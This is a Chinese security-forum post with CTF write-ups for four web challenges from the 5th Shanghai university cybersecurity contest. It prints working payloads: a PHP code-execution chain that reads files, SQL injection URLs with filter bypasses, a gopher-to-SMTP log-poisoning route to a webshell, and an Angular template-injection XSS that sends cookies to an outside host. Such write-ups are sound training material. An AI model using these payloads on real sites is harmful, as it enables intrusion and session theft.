安全矩阵

 找回密码
 立即注册
搜索
查看: 2262|回复: 0

第五届上海市大学生网络安全大赛

[复制链接]

8

主题

46

帖子

256

积分

中级会员

Rank: 3Rank: 3

积分
256
发表于 2020-4-2 21:59:15 | 显示全部楼层 |阅读模式
Decade
参考Payload:
/code/?code=echo(join(file(end(scandir(next(each(scandir(chr(floor(tan(tan(atan(atan(ord(cos(chdir(next(scandir(chr(floor(tan(tan(atan(atan(ord(cos(fclose(tmpfile()))))))))))))))))))))))))))));
Easysql
尝试寻找回显点,使用join bypass逗号过滤。
/article.php?id=0’ union%0bselect * from (select 1)a join (select 2)b join (select 3)c join (select 4)d%23
尝试爆表,但是or被过滤,我们选取另一个系统表mysql.innodb_table_stats。
/article.php?id=0’ union%0bselect * from (select 1)a join (select (select group_concat(table_name) from mysql.innodb_table_stats where database_name like database()))b join (select 3)c join (select 4)d%23
使用无列名注入,拿到flag。
/article.php?id=0’ union%0bselect * from (select 1)z join (select i.3 from (select * from (select 1)a join (select 2)b join (select 3)c union%0bselect * from fl111aa44a99g)i limit 1 offset 1)x join (select 3)v join (select 3)n%23
Babyt5
首先访问页面,是代码审计题目,有flag.php文件,但是有过滤 使用php的一个bug 绕过过滤读flag。Php,二次url编码,绕过读取提示
Php bug:https://bugs.php.net/bug.php?id=76671&edit=1
2. 根据提示查看 hosts文件。
3. 尝试访问临近ip ,发现内网服务器,发现是一个任意文件包含。
4. 但是没有其他服务,不好直接获取shell,于是扫描端口。
发现 25端口开放 smtp协议, 于是思路为通过gopher 打smtp协议,然后通过包含smtp 日志来获取webshell。
使用gopherus生成poc:

6. 通过二次编码gopher协议攻击内网smtp服务,污染日志。
7. 通过lfi 获取webshell 在根目录下发现flag
Lol2
题目是xss打管理员获取admin的cookie,然后替换cookie进入后台,存在delete后面的注入。从数据库中获取flag。
angular模板注入配合you.children[2].innerText执行xss代码(name有长度限制
{{[].pop.constructor(‘eval((you.children[2].innerText))’)()}}
输入框输入
new Image().src=“https://yourweb/”+document.cookie
你的网址必须可以接收2次以上,第一次接收的为自己的cookie,第二次才是admin的cookie。
使用admin的cookie来访问/admin,提交一次post表单,一番探测后发现删除处存在注入,编写 exp.py, 运行即可获取flag。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 05:28 , Processed in 0.013489 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表